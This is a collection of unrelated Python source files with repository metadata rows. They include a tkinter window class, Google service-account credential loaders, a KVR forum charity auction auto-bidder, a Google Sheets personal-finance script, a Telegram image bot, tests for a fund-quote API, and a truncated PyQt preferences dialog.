] | 14 | 2020-01-01T04:59:06.000Z | 2022-02-08T06:48:21.000Z | views/windows/basewindow.py | linhvien/portfolio-management-project | ac8ce313f8d62f09810fc1da19d6b252f193871b | [
"MIT"
] | null | null | null | views/windows/basewindow.py | linhvien/portfolio-management-project | ac8ce313f8d62f09810fc1da19d6b252f193871b | [
"MIT"
] | 8 | 2020-10-15T06:52:37.000Z | 2021-10-04T06:44:36.000Z | import tkinter as tk
class BaseWindow(tk.Toplevel):
def __init__(self):
super().__init__()
self.base_frame = tk.Frame(self)
self.base_frame.pack(fill="both", expand="true")
self.base_frame.pack_propagate(0)
self.frame_styles = {
"relief": "groove",
"bd": 3,
"bg": "#94b4d1",
"fg": "#073bb3",
"font": ("Arial", 9, "bold"),
}
self.text_styles = {
"font": ("Verdana", 10),
"background": "#3F6BAA",
"foreground": "#E1FFFF",
}
| 24.583333 | 56 | 0.476271 |
aba82608b365c3add79167593a64438d0fe2fb8a | 963 | py | Python | sync/auth.py | tstodden/google-sheets-sync | d3b73b9a2b76da1fabc6d0b1db43fc6b71fd0d23 | [
"MIT"
] | null | null | null | sync/auth.py | tstodden/google-sheets-sync | d3b73b9a2b76da1fabc6d0b1db43fc6b71fd0d23 | [
"MIT"
] | null | null | null | sync/auth.py | tstodden/google-sheets-sync | d3b73b9a2b76da1fabc6d0b1db43fc6b71fd0d23 | [
"MIT"
] | null | null | null | import os
from typing import NamedTuple
from google.oauth2.service_account import Credentials as OAuthCredentials
from .constants import OAUTH_CONFIG_PATH, OAUTH_SCOPES
class PostgresCredentials:
def __init__(self):
self.host = os.environ.get("SYNC_DB_HOST")
self.dbname = os.environ.get("SYNC_DB_NAME")
self.user = os.environ.get("SYNC_DB_USER")
self.password = os.environ.get("SYNC_DB_PASSWORD")
class Credentials(NamedTuple):
postgres: PostgresCredentials
oauth: OAuthCredentials
class CredentialsController:
def get(self) -> Credentials:
credentials = Credentials(
postgres=PostgresCredentials(), oauth=self._get_creds_from_google()
)
return credentials
def _get_creds_from_google(self) -> OAuthCredentials:
credentials = OAuthCredentials.from_service_account_file(
OAUTH_CONFIG_PATH, scopes=OAUTH_SCOPES
)
return credentials
| 28.323529 | 79 | 0.718588 |
aba8585d9a6da63e6cb8ee1a4fa109ef589d5a83 | 9,993 | py | Python | autobidder.py | planet-winter/forumbidder | f80f1893b8bb7284f3ca0a95f184812b5c4a0244 | [
"MIT"
] | null | null | null | autobidder.py | planet-winter/forumbidder | f80f1893b8bb7284f3ca0a95f184812b5c4a0244 | [
"MIT"
] | null | null | null | autobidder.py | planet-winter/forumbidder | f80f1893b8bb7284f3ca0a95f184812b5c4a0244 | [
"MIT"
] | null | null | null | #!/usr/bin/python
import requests
import json
import re
import mechanize
import cookielib
import sys
from BeautifulSoup import BeautifulSoup
# Variables
engaged = False
#topic_url="https://www.kvraudio.com/forum/viewtopic.php?f=1&t=470835"
topic_url = "http://www.kvraudio.com/forum/viewtopic.php?f=1&t=492028"
#topic_post_url = "https://www.kvraudio.com/forum/posting.php?mode=reply&f=1&t=470835"
topic_post_url = "https://www.kvraudio.com/forum/posting.php?mode=reply&f=1&t=492028"
# replace topic t= with current topic
topic_search_url = "https://www.kvraudio.com/forum/search.php?keywords=XXXXXXXX&t=492028&sf=msgonly"
login_url = "https://www.kvraudio.com/forum/ucp.php?mode=login"
username = "planetw"
password = "XYZ"
# max amount to bid for all software packages
total_max_bid = 600
software = {
"Twolegs Bundle": {
"search": "twolegs%20bundle",
"amount": 5,
"regex": re.compile('Twolegs.+Bundle.*?\$+.+([1-9][0-9]*[0,5])', flags=re.IGNORECASE),
"max_bid": 15,
"bids": [], #("bidderuser", int)
},
"TimeWARP2600": {
"search": "timewarp2600",
"amount": 5,
"regex": re.compile('Time\s?Warp2600.*?([1-9][0-9]*[0,5])', flags=re.IGNORECASE),
"max_bid": 60,
"bids": [], #("bidderuser", int)
},
"VSTBuzz 300 voucher": {
"search": "VSTBuzz%20voucher",
"amount": 1,
"regex": re.compile('VSTBuzz.*?voucher.*?([1-9][0-9]*[0,5])', flags=re.IGNORECASE),
"max_bid": 250,
"bids": [], #("bidderuser", int)
},
"Scaler plugin": {
"search": "scaler%20plugin",
"amount": 1,
"regex": re.compile('Scaler.+plugin.*?([1-9][0-9]*[0,5])', flags=re.IGNORECASE),
"max_bid": 10,
"bids": [], #("bidderuser", int)
},
# "Addictive Drums 2 Custom": {
# "search": "addictive%20drums%20custom",
# "amount": 1,
# "regex": re.compile('Addictive.*?Drums.*?2.*?Custom.*?([1-9][0-9]*[0,5])', flags=re.IGNORECASE),
# "max_bid": 1,
# "bids": [], #("bidderuser", int)
# },
"Reaper Commercial License": {
"search": "reaper%20commercial%20license",
"amount": 2,
"regex": re.compile('reaper.+commercial.+license.*?([1-9][0-9]*[0,5])', flags=re.IGNORECASE),
"max_bid": 60,
"bids": [], #("bidderuser", int)
},
# "Melodyne 4 Studio License": {
# "search": "melodyne%204%20license",
# "amount": 1,
# "regex": re.compile('Melodyne.*?4.*?Studio.*?License.*?([1-9][0-9]*[0,5])', flags=re.IGNORECASE),
# "max_bid": 1,
# "bids": [], #("bidderuser", int)
# },
# "Synth Magic Bundle 5": {
# "search": "synth%20magic%205",
# "amount": 5,
# "regex": re.compile('Synth.*?Magic.*?Bundle.*?5*?([1-9][0-9]*[0,5])', flags=re.IGNORECASE),
# "max_bid": 60,
# "bids": [], #("bidderuser", int)
# },
# "Studio Session Pack": {
# "search": "studio%20session%20pack",
# "amount": 3,
# "regex": re.compile('Studio.*?Session.*?Pack.*?([1-9][0-9]*[0,5])', flags=re.IGNORECASE),
# "max_bid": 1,
# "bids": [], #("bidderuser", int)
# },
"TAL Coupon": {
"search": "tal%20coupon",
"amount": 5,
"regex": re.compile('TAL.*?Coupon.*?([1-9][0-9]*[0,5])', flags=re.IGNORECASE),
"max_bid": 100,
"bids": [], #("bidderuser", int)
},
"PSP EffectPack": {
"search": "PSP%20Effect%20Pack",
"amount": 1,
"regex": re.compile('PSP.*?Effect.*?Pack.*?([1-9][0-9]*[0,5])', flags=re.IGNORECASE),
"max_bid": 150,
"bids": [], #("bidderuser", int)
},
"MPowerSynth": {
"search": "mpowersynth",
"amount": 1,
"regex": re.compile('Power.*?Synth.*?([1-9][0-9]*[0,5])', flags=re.IGNORECASE),
"max_bid": 80,
"bids": [], #("bidderuser", int)
}
}
total_bid_sum = 0
def login(username, password):
# use mechanize ...
# Browser
br = mechanize.Browser()
# Cookie Jar
cj = cookielib.LWPCookieJar()
br.set_cookiejar(cj)
# Browser options
br.set_handle_equiv(True)
br.set_handle_gzip(False)
br.set_handle_redirect(True)
br.set_handle_referer(True)
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
br.addheaders = [('User-agent', 'Chrome')]
# The site we will navigate into, handling it's session
br.open(login_url)
# View available forms
#for f in br.forms():
# print f
# Select the first (index zero) form
br.select_form(nr=0)
# User credentials
br.form['username'] = username
br.form['password'] = password
# Login
br.submit()
return br
def search_software(browser,software_name):
sw = software[software_name]
print "searching for", software_name
# make a single request to the homepage
response = browser.open(topic_search_url.replace("XXXXXXXX", sw["search"])).read()
# make soup
soup = BeautifulSoup(response)
#all posts without the initial auction post
posts = soup.findAll("div",{"class": "inner"})[:-1]
#posts_content = posts.findAll("div",{"class": "content"})
for post in posts:
re_software = re.compile(sw["regex"])
#post_content_soup = BeautifulSoup(post)
post_content = post.findAll("div",{"class": "content"})
if not post_content:
print "WARNING: no post content found something wrong?!, skipping software"
return
latest_bid = re_software.findall(post_content.text)
if latest_bid:
latest_bid = latest_bid[0]
latest_bid_user_soup = post.findAll("dt",{"class": "author"})[0]
latest_bid_user = latest_bid_user_soup.text.strip("by")
# exclude initial post by admin
if latest_bid_user != "Luftrum":
print "Found bid from user", latest_bid_user, "$", latest_bid, "for", software_name
bid = (latest_bid_user, int(latest_bid))
software[software_name]["bids"].append(bid)
software[software_name]["bids"].sort(key=lambda x: x[1])
def bid_software(browser,software_name):
search_software(browser, software_name)
global total_bid_sum
amount = software[software_name]["amount"]
max_bid = software[software_name]["max_bid"]
software_bids = software[software_name]["bids"]
relevant_bids = software_bids[:amount]
print "found the last relevant bids", relevant_bids
# dont overbid ourselfes
if [ bid for bid in relevant_bids if bid[0] == username]:
print "not bidding. we would overbid ourselve"
else:
# only overbid the lowest bid in relevant_bids
if len(software[software_name]["bids"]) < amount:
print "bidding min amount as there are more packages than bids"
bid_price = 5
else:
relevant_min_bid_price = software[software_name]["bids"][0][1]
# bid 5$ price < 100 else bid 10$
if relevant_min_bid_price < 100:
bid_price = relevant_min_bid_price + 5
else:
bid_price = relevant_min_bid_price + 10
# dont exceed software's max_bid
if bid_price >= max_bid:
print "bid would exceed software's max_bid parameter"
return
if total_bid_sum + bid_price >= total_max_bid:
print "total bid price exeeds total_max_bid parameter"
print "out of funds"
return
if engaged:
# do real bidding
browser.open(topic_post_url)
# View available forms
#for f in browser.forms():
# print "FORM:"
# print f
# Select the first (index zero) form
browser.select_form(nr=0)
message = "Bidding for " + software_name + " $" + str(bid_price)
# post message
browser.form['message'] = message
browser.method = 'POST'
# send !
response = browser.submit(name='post')
print "placed bid in forum:", message
total_bid_sum += bid_price
print "TOTAL bid sum so far:", total_bid_sum
else:
print "not engaged: would be BIDDING $", bid_price, "on", software_name
def main():
browser = login(username,password)
print "+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++"
print "This script bids in the KVR audio forum charity - bid for the charity!"
print "make sure to adjust the parameters in the variable section well"
print "the used forum search does not always return all necessary results as people spell the packages differently"
print "also pay attention to the regexpressions not to be too greedy and match wrong numbers"
print "+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++"
raw_input("Press Enter to continue...")
while True:
for software_name in software:
bid_software(browser, software_name)
print "------------------------------------------------"
print "TOTAL bid sum:", total_bid_sum, "after this cycle"
print "------------------------------------------------"
if not engaged:
print "ran only once as we are not live (engaged = False)"
quit()
if __name__ == "__main__":
main()
# Garbage...
# # parse for pagination div
# pagination_div = soup.findAll("div",{"class": "pagination"})[0]
# thread_last_page_url = pagination_div.findAll("a")[-1]["href"]
# number = re.compile('\d+')
# thread_nr_of_posts = number.match(pagination_div.text).group()
# thread_posts_content = soup.findAll("div",{"class": "content"})
| 34.105802 | 119 | 0.566497 |
aba85a8982f79dd5cfad67d945512f5c715817c8 | 371 | py | Python | office_tracker/leave_tracker/apps.py | tanvir002700/tracker | 567c3be2f36ac120fb412c06126cbd8fa72be4b9 | [
"MIT"
] | null | null | null | office_tracker/leave_tracker/apps.py | tanvir002700/tracker | 567c3be2f36ac120fb412c06126cbd8fa72be4b9 | [
"MIT"
] | 11 | 2020-06-05T18:04:42.000Z | 2022-03-11T23:19:32.000Z | office_tracker/leave_tracker/apps.py | tanvir002700/tracker | 567c3be2f36ac120fb412c06126cbd8fa72be4b9 | [
"MIT"
] | null | null | null | from django.apps import AppConfig
from django.db.models.signals import post_save
from django.apps import apps
from .signals import assign_season_to_all_user
class LeaveTrackerConfig(AppConfig):
name = 'leave_tracker'
def ready(self):
Season = apps.get_model('leave_tracker', 'Season')
post_save.connect(assign_season_to_all_user, sender=Season)
| 30.916667 | 67 | 0.773585 |
abab9d30016bdfbdb016a1d0c85da2a580756ebd | 5,970 | py | Python | accounts.py | SurajOliver/tradense | 9f14b6114be1b5753f0252f081e6efb7c26abf19 | [
"MIT"
] | null | null | null | accounts.py | SurajOliver/tradense | 9f14b6114be1b5753f0252f081e6efb7c26abf19 | [
"MIT"
] | null | null | null | accounts.py | SurajOliver/tradense | 9f14b6114be1b5753f0252f081e6efb7c26abf19 | [
"MIT"
] | null | null | null | import datetime
import numpy as np
import pandas as pd
from google.oauth2 import service_account
from googleapiclient import discovery
SPREADSHEET_ID = "1otVI0JgfuBDJw8jlW_l8vHXyfo5ufJiXOqshDixazZA" # ALL-IN-ONE-LOG-2021
class Spreadsheet:
def __init__(self, spreadsheetId):
self.spreadsheetId = spreadsheetId
self.sheet = self.get_all_in_one_log()
def get_all_in_one_log(self):
SERVICE_ACCOUNT_FILE = "credentials.json"
SCOPES = ["https://www.googleapis.com/auth/spreadsheets"]
creds = service_account.Credentials.from_service_account_file(
SERVICE_ACCOUNT_FILE, scopes=SCOPES
)
service = discovery.build("sheets", "v4", credentials=creds)
sheet = service.spreadsheets()
return sheet
def getSheet(self):
return self.sheet
def list_last_five_trans():
result = (
sheet.values().get(spreadsheetId=SPREADSHEET_ID, range="Trans!B6:G").execute()
)
values = result.get("values", [])
df = pd.DataFrame(
values, columns=["Date", "Description", "Dummy", "Amount", "From A/c", "To A/c"]
)
df["Description"] = df["Description"].str.slice(0, 20)
print(df.tail(5))
return
def list_last_30_trans():
result = (
sheet.values().get(spreadsheetId=SPREADSHEET_ID, range="Trans!B6:G").execute()
)
values = result.get("values", [])
df = pd.DataFrame(
values, columns=["Date", "Description", "Dummy", "Amount", "From A/c", "To A/c"]
)
df["Description"] = df["Description"].str.slice(0, 20)
print(df.tail(30))
return
def check_balances():
res2 = (
sheet.values()
.get(spreadsheetId=SPREADSHEET_ID, range="Dashboard!B9:B19")
.execute()
)
acc = res2.get("values", [])
result = (
sheet.values()
.get(spreadsheetId=SPREADSHEET_ID, range="Dashboard!P9:P19")
.execute()
)
val = result.get("values", [])
balances = np.array(val)
balances = balances.flatten()
balances[balances == "#N/A"] = "0"
balances = list(map(float, balances))
(
C,
K,
Zer,
Zer_Comm,
Cams,
Samrudhi,
Citi,
K_Fixed,
Union,
Z_Hold,
Citi_Fixed,
) = balances
print(f"Cash Balance~~~~~~~~~~~~~~~~~~~~~:{C:.2f}")
print(
f"Saving A/c Balance~~~~~~~~~~~~~~~:{(K+Citi):.2f} with (Kotak-{K:.2f} and Citi-{Citi:.2f})"
)
print(
f"In FD (CB,Kotak,Union, Samruddhi):{(K_Fixed+Union+Citi_Fixed):.2f} with (K-{K_Fixed:.2f}, Citi-{Citi_Fixed:.2f})"
)
print(f"Unutilized in Shares~~~~~~~~~~~~~:{Zer:.2f}")
print(f"In CAMS MF~~~~~~~~~~~~~~~~~~~~~~~:{Cams:.2f}")
print(f"In shares~~~~~~~~~~~~~~~~~~~~~~~~:{Z_Hold:.2f}")
return
def check_expenses():
result = (
sheet.values()
.get(spreadsheetId=SPREADSHEET_ID, range="Dashboard!C46:C46")
.execute()
)
values = result.get("values", [])
print("Expenses for the year: " + values[0][0])
return
class Account:
def __init__(self, desc, amount, from_ac, to_ac):
self.desc = desc
self.amount = amount
self.from_ac = from_ac
self.to_ac = to_ac
self.catg = "Adjustment"
if self.from_ac == "C" or self.from_ac == "K":
self.catg = "Expense"
self.today = datetime.datetime.now()
self.period = datetime.date.strftime(self.today, "%Y-%m")
self.formatted_dt = datetime.date.strftime(self.today, "%m/%d/%Y")
self.new_trans = [
[
self.formatted_dt,
self.desc,
"",
self.amount,
self.from_ac,
self.to_ac,
"",
self.period,
self.catg,
]
]
def get_trans(self):
return self.new_trans
def add_new_record():
print("Adding new records, Enter description, amount, from a/c and to a/c")
desc = input("description is: ")
amount = input("trans amount: ")
from_ac = input(" from account: ")
to_ac = input(" to account: ")
account = Account(desc, amount, from_ac, to_ac)
print(" Transaction to be entered is: ", account.get_trans())
conf = 0
while conf != 1 and conf != 9:
conf = int(input(" Enter 1 to confirm, 9 to erase: "))
if conf == 9:
print("Exiting adding new record, please re-enter your choice: ")
return
request = sheet.values().append(
spreadsheetId=SPREADSHEET_ID,
range="Trans!B6:J",
valueInputOption="USER_ENTERED",
insertDataOption="INSERT_ROWS",
body={"values": account.get_trans()},
)
response = request.execute()
print("Added new record: ")
print(response)
return
class Choice:
switcher = {
1: add_new_record,
4: list_last_30_trans,
5: list_last_five_trans,
6: check_balances,
7: check_expenses,
}
def __init__(self, SpreadSheet):
self._choice = 0
self.exit = False
self.Spreadsheet = Spreadsheet
def is_exit(self):
return self.exit
def get_choice(self):
print("~~~~~~ MAIN MENU ~~~~~~~")
print("1:ADD, 4:LIST-30, 5:LIST-5, 6:CHECK-BALANCE, 7:.CHECK-EXPENSES 9: Quit")
self._choice = int(input("Enter your choice : "))
if self._choice == 9:
self.exit = True
return self._choice
def switch_choice(self):
func = self.switcher.get(self._choice, lambda: "Invalid choice")
func()
if __name__ == "__main__":
AccountSheet = Spreadsheet(SPREADSHEET_ID)
sheet = AccountSheet.getSheet()
# sheet = get_all_in_one_log()
# list_last_five_trans()
choice = Choice(AccountSheet)
while choice.is_exit() == False:
choice.get_choice()
choice.switch_choice()
print("Exiting out.. kind regards!")
| 27.638889 | 123 | 0.574372 |
abac1a3c955f1251fb90f89726bf46a055cf6faa | 1,513 | py | Python | bot.py | googlewaitme/picture-bot | ecdbb7b925f11c073e654a403aca4c91d7cbde6d | [
"MIT"
] | null | null | null | bot.py | googlewaitme/picture-bot | ecdbb7b925f11c073e654a403aca4c91d7cbde6d | [
"MIT"
] | null | null | null | bot.py | googlewaitme/picture-bot | ecdbb7b925f11c073e654a403aca4c91d7cbde6d | [
"MIT"
] | null | null | null | import telebot
import settings
import helpers
from models import User
bot = telebot.TeleBot(settings.token, parse_mode=None)
users = dict()
@bot.message_handler(commands=['start', 'help'])
def send_help(message):
if not message.chat.id in users:
users[message.chat.id] = User()
bot.reply_to(message, settings.help_message)
@bot.message_handler(commands=['list_themes'])
def send_themes_list(message):
bot.reply_to(message, settings.themes_list)
@bot.message_handler(commands=['list_picture_formats'])
def send_generators_list(message):
bot.reply_to(message, settings.generators_list)
@bot.message_handler(func=helpers.check_new_image_format)
def set_new_image_format(message):
if not message.chat.id in users:
users[message.chat.id] = User()
users[message.chat.id].set_image_generator(message.text)
bot.reply_to(message, 'Новый формат изображения установлен!')
@bot.message_handler(func=helpers.check_new_color_theme)
def set_color_theme(message):
if not message.chat.id in users:
users[message.chat.id] = User()
users[message.chat.id].set_color_theme(message.text)
bot.reply_to(message, 'Новая тема установлена!')
@bot.message_handler(func=lambda message: True)
def send_image(message):
print(message.chat.id)
if not message.chat.id in users:
bot.reply_to(message, settings.help_message)
else:
helpers.generate_image(text=message.text, user=users[message.chat.id], filename='photo.jpg')
photo = open('photo.jpg', 'rb')
bot.send_photo(message.chat.id, photo)
bot.polling()
| 28.54717 | 94 | 0.777925 |
abac74889730121207b018502893e78b98c8747a | 422 | py | Python | apps/users/migrations/0008_user_roles.py | andipandiber/CajaAhorros | cb0769fc04529088768ea650f9ee048bd9a55837 | [
"MIT"
] | null | null | null | apps/users/migrations/0008_user_roles.py | andipandiber/CajaAhorros | cb0769fc04529088768ea650f9ee048bd9a55837 | [
"MIT"
] | 8 | 2021-03-30T13:39:24.000Z | 2022-03-12T00:36:15.000Z | apps/users/migrations/0008_user_roles.py | andresbermeoq/CajaAhorros | cb0769fc04529088768ea650f9ee048bd9a55837 | [
"MIT"
] | null | null | null | # Generated by Django 3.0.7 on 2020-07-08 15:41
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('roles', '0001_initial'),
('users', '0007_auto_20200706_0436'),
]
operations = [
migrations.AddField(
model_name='user',
name='roles',
field=models.ManyToManyField(to='roles.Role'),
),
]
| 21.1 | 58 | 0.582938 |
abafaffe850f5ad038e992cc605a8658d0b5ae83 | 7,158 | py | Python | app/routers/brandnewday_test.py | nbult/quotes | 3bfe31a0c5c629c4883a2cf10bf582a9f16ea209 | [
"MIT"
] | null | null | null | app/routers/brandnewday_test.py | nbult/quotes | 3bfe31a0c5c629c4883a2cf10bf582a9f16ea209 | [
"MIT"
] | 1 | 2021-08-25T11:12:59.000Z | 2021-08-25T11:12:59.000Z | app/routers/brandnewday_test.py | nickybulthuis/quotes | 3bfe31a0c5c629c4883a2cf10bf582a9f16ea209 | [
"MIT"
] | null | null | null | import json
from datetime import date, datetime
import pytest
import responses
from fastapi.testclient import TestClient
from .brandnewday import funds_cache, quote_cache
from ..main import app
from ..models import Quote
client = TestClient(app)
prefix = '/brandnewday/'
@pytest.fixture(autouse=True)
def clear_cache():
funds_cache.clear()
quote_cache.clear()
yield
def setup_get_funds_response():
body = {'Message': json.dumps([{"Key": "1002", "Value": "bnd-wereld-indexfonds-c-hedged"},
{"Key": "1012", "Value": "bnd-wereld-indexfonds-c-unhedged"}])}
responses.add(responses.GET, 'https://secure.brandnewday.nl/service/getfundsnew/', json=body, status=200)
@responses.activate
def test_get_funds_returns_funds_list():
setup_get_funds_response()
response = client.get(prefix, allow_redirects=False)
assert response.status_code == 200
assert response.json() == ['bnd-wereld-indexfonds-c-hedged', 'bnd-wereld-indexfonds-c-unhedged']
@responses.activate
def test_get_funds_returns_502():
responses.add(responses.GET, 'https://secure.brandnewday.nl/service/getfundsnew/',
body='error', status=502)
response = client.get(prefix, allow_redirects=False)
assert response.status_code == 502
def test_get_quotes_unknown_name_returns_http404():
setup_get_funds_response()
response = client.get(prefix + 'unknown', allow_redirects=False)
assert response.status_code == 404
@responses.activate
def test_get_quotes_server_error_returns_http502():
setup_get_funds_response()
responses.add(
responses.POST,
url='https://secure.brandnewday.nl/service/navvaluesforfund/',
body='error',
status=500
)
response = client.get(prefix + 'bnd-wereld-indexfonds-c-unhedged')
assert response.status_code == 502
@responses.activate
def test_get_quotes_invalid_page():
setup_get_funds_response()
response = client.get(prefix + 'bnd-wereld-indexfonds-c-unhedged?page=0')
assert response.status_code == 400
@responses.activate
def test_get_quotes_known_name_returns_http200():
setup_get_funds_response()
body = {'Data': [
{'FundId': 1012, 'FundLabel': None, 'LastRate': 13.535882, 'BidRate': 13.535882, 'AskRate': 13.535882,
'RateDate': '/Date(1616284800000)/', 'Yield': -0.2612228741355754, 'InsertedBy': None,
'Inserted': '/Date(-62135596800000)/', 'UpdatedBy': None, 'Updated': '/Date(-62135596800000)/'},
{'FundId': 1012, 'FundLabel': None, 'LastRate': 13.535846, 'BidRate': 13.535846, 'AskRate': 13.535846,
'RateDate': '/Date(1616198400000)/', 'Yield': -0.2612228741355754, 'InsertedBy': None,
'Inserted': '/Date(-62135596800000)/', 'UpdatedBy': None, 'Updated': '/Date(-62135596800000)/'},
{'FundId': 1012, 'FundLabel': None, 'LastRate': 13.535809, 'BidRate': 13.535809, 'AskRate': 13.535809,
'RateDate': '/Date(1616112000000)/', 'Yield': -0.2612228741355754, 'InsertedBy': None,
'Inserted': '/Date(-62135596800000)/', 'UpdatedBy': None, 'Updated': '/Date(-62135596800000)/'},
],
'Total': 1224, 'AggregateResults': None, 'Errors': None}
responses.add(
responses.POST,
url='https://secure.brandnewday.nl/service/navvaluesforfund/',
json=body,
headers={'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8'},
match=[
responses.urlencoded_params_matcher({'page': '1',
'pageSize': '60',
'fundId': '1012',
'startDate': '01-01-2010',
'endDate': date.today().strftime('%d-%m-%Y'),
})
],
status=200
)
response = client.get(prefix + 'bnd-wereld-indexfonds-c-unhedged')
assert len(quote_cache) == 1
assert response.status_code == 200
assert response.json() == [{'Close': 13.535882, 'Date': '2021-03-21T00:00:00'},
{'Close': 13.535846, 'Date': '2021-03-20T00:00:00'},
{'Close': 13.535809, 'Date': '2021-03-19T00:00:00'}]
@responses.activate
def test_get_quotes_are_cached():
setup_get_funds_response()
body = {'Data': [
{'FundId': 1012, 'FundLabel': None, 'LastRate': 13.535882, 'BidRate': 13.535882, 'AskRate': 13.535882,
'RateDate': '/Date(1616284800000)/', 'Yield': -0.2612228741355754, 'InsertedBy': None,
'Inserted': '/Date(-62135596800000)/', 'UpdatedBy': None, 'Updated': '/Date(-62135596800000)/'},
{'FundId': 1012, 'FundLabel': None, 'LastRate': 13.535846, 'BidRate': 13.535846, 'AskRate': 13.535846,
'RateDate': '/Date(1616198400000)/', 'Yield': -0.2612228741355754, 'InsertedBy': None,
'Inserted': '/Date(-62135596800000)/', 'UpdatedBy': None, 'Updated': '/Date(-62135596800000)/'},
{'FundId': 1012, 'FundLabel': None, 'LastRate': 13.535809, 'BidRate': 13.535809, 'AskRate': 13.535809,
'RateDate': '/Date(1616112000000)/', 'Yield': -0.2612228741355754, 'InsertedBy': None,
'Inserted': '/Date(-62135596800000)/', 'UpdatedBy': None, 'Updated': '/Date(-62135596800000)/'},
],
'Total': 1224, 'AggregateResults': None, 'Errors': None}
responses.add(
responses.POST,
url='https://secure.brandnewday.nl/service/navvaluesforfund/',
json=body,
headers={'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8'},
match=[responses.urlencoded_params_matcher(
{'page': '1', 'pageSize': '60', 'fundId': '1012', 'startDate': '01-01-2010',
'endDate': date.today().strftime('%d-%m-%Y')})],
status=200
)
responses.add(
responses.POST,
url='https://secure.brandnewday.nl/service/navvaluesforfund/',
body='error',
headers={'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8'},
match=[responses.urlencoded_params_matcher(
{'page': '1', 'pageSize': '60', 'fundId': '1012', 'startDate': '01-01-2010',
'endDate': date.today().strftime('%d-%m-%Y')})],
status=500
)
assert len(quote_cache) == 0
response = client.get(prefix + 'bnd-wereld-indexfonds-c-unhedged')
assert response.status_code == 200
assert response.json() == [{'Close': 13.535882, 'Date': '2021-03-21T00:00:00'},
{'Close': 13.535846, 'Date': '2021-03-20T00:00:00'},
{'Close': 13.535809, 'Date': '2021-03-19T00:00:00'}]
assert len(quote_cache) == 1
response = client.get(prefix + 'bnd-wereld-indexfonds-c-unhedged')
assert response.status_code == 200
assert quote_cache['1012@1'] == [Quote(Date=datetime(2021, 3, 21, 0, 0, 0), Close=13.535882),
Quote(Date=datetime(2021, 3, 20, 0, 0, 0), Close=13.535846),
Quote(Date=datetime(2021, 3, 19, 0, 0, 0), Close=13.535809)]
| 41.137931 | 110 | 0.607572 |
abb0ccb320d11e326c6450c49171c55c9d867c94 | 5,385 | py | Python | meggie/mainwindow/dialogs/preferencesDialogUi.py | Teekuningas/meggie | 0790559febb990a5487d4f0c92987066632e1d99 | [
"BSD-2-Clause-FreeBSD"
] | 4 | 2020-04-29T08:57:11.000Z | 2021-01-15T21:21:51.000Z | meggie/mainwindow/dialogs/preferencesDialogUi.py | Teekuningas/meggie | 0790559febb990a5487d4f0c92987066632e1d99 | [
"BSD-2-Clause-FreeBSD"
] | 16 | 2019-05-03T10:31:16.000Z | 2021-05-06T14:59:55.000Z | meggie/mainwindow/dialogs/preferencesDialogUi.py | cibr-jyu/meggie | 0790559febb990a5487d4f0c92987066632e1d99 | [
"BSD-2-Clause-FreeBSD"
] | 3 | 2020-12-12T09:57:00.000Z | 2020-12-20T17:12:05.000Z | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'preferencesDialogUi.ui'
#
# Created by: PyQt5 UI code generator 5.12.3
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_DialogPreferences(object):
def setupUi(self, DialogPreferences):
DialogPreferences.setObjectName("DialogPreferences")
DialogPreferences.resize(507, 482)
self.gridLayout_3 = QtWidgets.QGridLayout(DialogPreferences)
self.gridLayout_3.setObjectName("gridLayout_3")
self.horizontalLayout_2 = QtWidgets.QHBoxLayout()
self.horizontalLayout_2.setObjectName("horizontalLayout_2")
spacerItem = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout_2.addItem(spacerItem)
self.pushButtonCancel = QtWidgets.QPushButton(DialogPreferences)
self.pushButtonCancel.setObjectName("pushButtonCancel")
self.horizontalLayout_2.addWidget(self.pushButtonCancel)
self.pushButtonAccept = QtWidgets.QPushButton(DialogPreferences)
self.pushButtonAccept.setObjectName("pushButtonAccept")
self.horizontalLayout_2.addWidget(self.pushButtonAccept)
self.gridLayout_3.addLayout(self.horizontalLayout_2, 5, 0, 1, 1)
self.scrollArea = QtWidgets.QScrollArea(DialogPreferences)
self.scrollArea.setWidgetResizable(True)
self.scrollArea.setObjectName("scrollArea")
self.scrollAreaWidgetContents = QtWidgets.QWidget()
self.scrollAreaWidgetContents.setGeometry(QtCore.QRect(0, 0, 487, 431))
self.scrollAreaWidgetContents.setObjectName("scrollAreaWidgetContents")
self.gridLayout_5 = QtWidgets.QGridLayout(self.scrollAreaWidgetContents)
self.gridLayout_5.setObjectName("gridLayout_5")
self.groupBoxMisc = QtWidgets.QGroupBox(self.scrollAreaWidgetContents)
self.groupBoxMisc.setObjectName("groupBoxMisc")
self.gridLayout_4 = QtWidgets.QGridLayout(self.groupBoxMisc)
self.gridLayout_4.setObjectName("gridLayout_4")
self.checkBoxAutomaticOpenPreviousExperiment = QtWidgets.QCheckBox(self.groupBoxMisc)
self.checkBoxAutomaticOpenPreviousExperiment.setObjectName("checkBoxAutomaticOpenPreviousExperiment")
self.gridLayout_4.addWidget(self.checkBoxAutomaticOpenPreviousExperiment, 0, 0, 1, 1)
self.gridLayout_5.addWidget(self.groupBoxMisc, 2, 0, 1, 1)
spacerItem1 = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)
self.gridLayout_5.addItem(spacerItem1, 3, 0, 1, 1)
self.groupBoxWorkspace = QtWidgets.QGroupBox(self.scrollAreaWidgetContents)
self.groupBoxWorkspace.setObjectName("groupBoxWorkspace")
self.gridLayout_2 = QtWidgets.QGridLayout(self.groupBoxWorkspace)
self.gridLayout_2.setObjectName("gridLayout_2")
self.LineEditFilePath = QtWidgets.QLineEdit(self.groupBoxWorkspace)
self.LineEditFilePath.setObjectName("LineEditFilePath")
self.gridLayout_2.addWidget(self.LineEditFilePath, 0, 0, 1, 1)
self.ButtonBrowseWorkingDir = QtWidgets.QPushButton(self.groupBoxWorkspace)
self.ButtonBrowseWorkingDir.setObjectName("ButtonBrowseWorkingDir")
